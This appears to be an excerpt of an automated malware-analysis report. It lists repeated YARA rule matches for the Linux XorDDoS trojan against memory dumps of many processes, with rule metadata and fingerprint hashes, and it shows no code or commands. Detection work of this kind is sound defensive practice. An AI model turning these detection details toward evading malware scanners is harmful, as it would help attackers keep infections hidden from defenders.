Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6316.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6409.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6400.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6400.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6400.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6400.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6400.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6400.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6251.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6251.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6251.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6251.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6251.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6251.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
